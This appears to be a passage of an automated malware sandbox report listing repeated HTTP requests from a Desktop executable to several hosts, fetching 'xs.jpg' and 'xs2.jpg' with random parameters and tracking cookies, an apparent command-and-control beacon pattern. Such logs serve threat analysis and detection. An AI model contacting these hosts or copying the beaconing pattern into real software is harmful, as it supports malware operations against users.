                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 68 6d 65 64 69 79 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  106192.168.2.94981937.230.104.89807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:19.462964058 CEST206OUTGET /images/xs2.jpg?494885e8=-1819495128 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:02:20.199573994 CEST933INHTTP/1.1 301 Moved Permanently
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  content-type: text/html
                                  content-length: 707
                                  date: Fri, 05 Jul 2024 06:02:20 GMT
                                  location: http://ampyazilim.com.tr/images/xs2.jpg?1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  107192.168.2.94982037.230.104.89807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:20.574193954 CEST211OUTGET /images/xs2.jpg?1 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Connection: Keep-Alive
                                  Jul 5, 2024 08:02:21.437925100 CEST646INHTTP/1.1 200 OK
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  cache-control: max-age=84600, public
                                  expires: Fri, 12 Jul 2024 06:02:21 GMT
                                  content-type: image/jpeg
                                  last-modified: Thu, 02 Dec 2021 06:14:43 GMT
                                  accept-ranges: bytes
                                  content-length: 340
                                  date: Fri, 05 Jul 2024 06:02:21 GMT
                                  Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 0a 07 07 09 07 06 0a 09 08 09 0b 0b 0a 0c 0f 19 10 0f 0e 0e 0f 1e 16 17 12 19 24 20 26 25 23 20 23 22 28 2d 39 30 28 2a 36 2b 22 23 32 44 32 36 3b 3d 40 40 40 26 30 46 4b 45 3e 4a 39 3f 40 3d ff db 00 43 01 0b 0b 0b 0f 0d 0f 1d 10 10 1d 3d 29 23 29 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d ff c2 00 11 08 00 0a 00 0a 03 01 11 00 02 11 01 03 11 01 ff c4 00 15 00 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 ff c4 00 14 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 b3 00 0f ff c4 00 14 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 01 00 01 3f 00 1f ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 02 01 01 3f 00 1f ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 03 01 01 3f 00 1f [TRUNCATED]
                                  Data Ascii: JFIFC$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=C=)#)================================================== ? ? ?


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  108192.168.2.94982154.244.188.177807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:21.587513924 CEST310OUTGET /images/xs.jpg?4e1a4979=218554042 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: www.careerdesk.org
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159337|1720159259|3|21|0
                                  Jul 5, 2024 08:02:22.330648899 CEST595INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:22 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159342|1720159259|4|22|0; path=/; domain=.careerdesk.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  109192.168.2.94982244.221.84.105807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:22.352420092 CEST302OUTGET /xs.jpg?4fe5ce70=1066875328 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: arthur.niria.biz
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159338|1720159259|3|21|0
                                  Jul 5, 2024 08:02:22.855791092 CEST586INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:22 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159342|1720159259|3|22|0; path=/; domain=.niria.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  110192.168.2.94982344.221.84.105807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:22.866674900 CEST305OUTGET /images/xs.jpg?50eb79ae=-222139126 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: apple-pie.in
                                  Cache-Control: no-cache
                                  Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159338|1720159260|3|21|0; snkz=8.46.123.33
                                  Jul 5, 2024 08:02:23.372435093 CEST334INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:23 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159343|1720159260|4|22|0; path=/; domain=.apple-pie.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  111192.168.2.94982478.46.2.155807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:23.402045965 CEST191OUTGET /xs.jpg?54bd4f7c=-29888908 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ahmediye.net
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:02:24.085544109 CEST403INHTTP/1.1 404 Not Found
                                  Date: Fri, 05 Jul 2024 06:02:23 GMT
                                  Server: Apache
                                  Content-Length: 258
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 68 6d 65 64 69 79 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  112192.168.2.94982537.230.104.89807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:24.133917093 CEST204OUTGET /images/xs2.jpg?5bf62f02=667228684 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:02:24.841244936 CEST933INHTTP/1.1 301 Moved Permanently
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  content-type: text/html
                                  content-length: 707
                                  date: Fri, 05 Jul 2024 06:02:24 GMT
                                  location: http://ampyazilim.com.tr/images/xs2.jpg?1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                  Jul 5, 2024 08:02:24.847831011 CEST211OUTGET /images/xs2.jpg?1 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Connection: Keep-Alive
                                  Jul 5, 2024 08:02:25.069262028 CEST646INHTTP/1.1 200 OK
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  cache-control: max-age=84600, public
                                  expires: Fri, 12 Jul 2024 06:02:24 GMT
                                  content-type: image/jpeg
                                  last-modified: Thu, 02 Dec 2021 06:14:43 GMT
                                  accept-ranges: bytes
                                  content-length: 340
                                  date: Fri, 05 Jul 2024 06:02:24 GMT
                                  Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 0a 07 07 09 07 06 0a 09 08 09 0b 0b 0a 0c 0f 19 10 0f 0e 0e 0f 1e 16 17 12 19 24 20 26 25 23 20 23 22 28 2d 39 30 28 2a 36 2b 22 23 32 44 32 36 3b 3d 40 40 40 26 30 46 4b 45 3e 4a 39 3f 40 3d ff db 00 43 01 0b 0b 0b 0f 0d 0f 1d 10 10 1d 3d 29 23 29 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d ff c2 00 11 08 00 0a 00 0a 03 01 11 00 02 11 01 03 11 01 ff c4 00 15 00 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 ff c4 00 14 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 b3 00 0f ff c4 00 14 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 01 00 01 3f 00 1f ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 02 01 01 3f 00 1f ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 03 01 01 3f 00 1f [TRUNCATED]
                                  Data Ascii: JFIFC$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=C=)#)================================================== ? ? ?


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  113192.168.2.94982654.244.188.177807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:25.220412970 CEST312OUTGET /images/xs.jpg?5fcee9d4=-1633131316 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: www.careerdesk.org
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159342|1720159259|4|22|0
                                  Jul 5, 2024 08:02:25.959955931 CEST595INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:25 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159345|1720159259|3|23|0; path=/; domain=.careerdesk.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  114192.168.2.94982744.221.84.105807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:25.987014055 CEST303OUTGET /xs.jpg?66b9efaa=-1696088408 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: arthur.niria.biz
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159342|1720159259|3|22|0
                                  Jul 5, 2024 08:02:26.497833014 CEST586INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:26 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159346|1720159259|3|23|0; path=/; domain=.niria.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  115192.168.2.94982844.221.84.105807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:26.526856899 CEST306OUTGET /images/xs.jpg?6c8a2c8f=-1305955780 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: apple-pie.in
                                  Cache-Control: no-cache
                                  Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159343|1720159260|4|22|0; snkz=8.46.123.33
                                  Jul 5, 2024 08:02:27.039295912 CEST334INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:26 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159346|1720159260|3|23|0; path=/; domain=.apple-pie.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  116192.168.2.94982978.46.2.155807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:27.230077982 CEST192OUTGET /xs.jpg?6e4b76cf=-594088546 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ahmediye.net
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:02:27.903812885 CEST403INHTTP/1.1 404 Not Found
                                  Date: Fri, 05 Jul 2024 06:02:27 GMT
                                  Server: Apache
                                  Content-Length: 258
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 68 6d 65 64 69 79 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  117192.168.2.94983037.230.104.89807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:27.958117962 CEST205OUTGET /images/xs2.jpg?72a457e7=1026930563 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:02:28.694031000 CEST933INHTTP/1.1 301 Moved Permanently
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  content-type: text/html
                                  content-length: 707
                                  date: Fri, 05 Jul 2024 06:02:28 GMT
                                  location: http://ampyazilim.com.tr/images/xs2.jpg?1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
